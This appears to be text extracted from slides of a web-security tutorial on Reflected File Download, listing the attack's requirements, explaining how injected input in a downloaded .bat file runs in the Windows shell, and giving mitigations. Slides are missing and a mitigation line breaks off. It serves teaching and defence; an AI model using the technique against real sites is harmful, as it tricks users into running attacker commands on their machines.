12. Reflected File Download
12
Finally we got all our 3 requirements.
● We can control the user input.
● We can control the file extension.
● We have the downloadable response.
4. Exploitation
Who knows how to play with sword, can do many kills.
After getting all 3 requirements, now it's time to exploit this
vulnerability.
If you observe the behavior of the “bat” file, Then you will realized that
any command present in the bat file, will be executed directly in
windows shell!
Like there is a file called “mkdir.bat”, This file contents these code
“mkdir tmp”.
Now whenever this file will get executed , The code will interact with
the windows shell and create a new folder called “tmp”.
Same like this, If you observe our user input response in downloaded
file, You will get to know that we can also inject our custom command
there.
19. Reflected File Download
19
Add Content-Dispositions: attachment; filename header which will
prevent the attacker to control the file extension.
Don’t allow the application to take permissive input.
Limit the callback function for “;” “
Conclusion
After analysis of this vulnerability, We can say there is always a
vulnerability/weaknees in modern web applications dosnt matter in which
platform they are made. We should look for every possiblity for every
attack.
Still many organisation think its not a vulnerability because this is affecting
the user/victim machine not the application itself, But After a close look we
can say This vulnerability is happening because of the vulnerable application
and this affecting on their user.There is an another matter of thinking that
this vulnerability is exploiting the trust of the user which they website they
are visiting most.
Source: https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-
Reflected-File-Download-A-New-Web-Attack-Vector.pdf
Narendra Bhati
@imnarendrabhati
https://websecgeeks.com
narendra.bhati@websecgeeks.com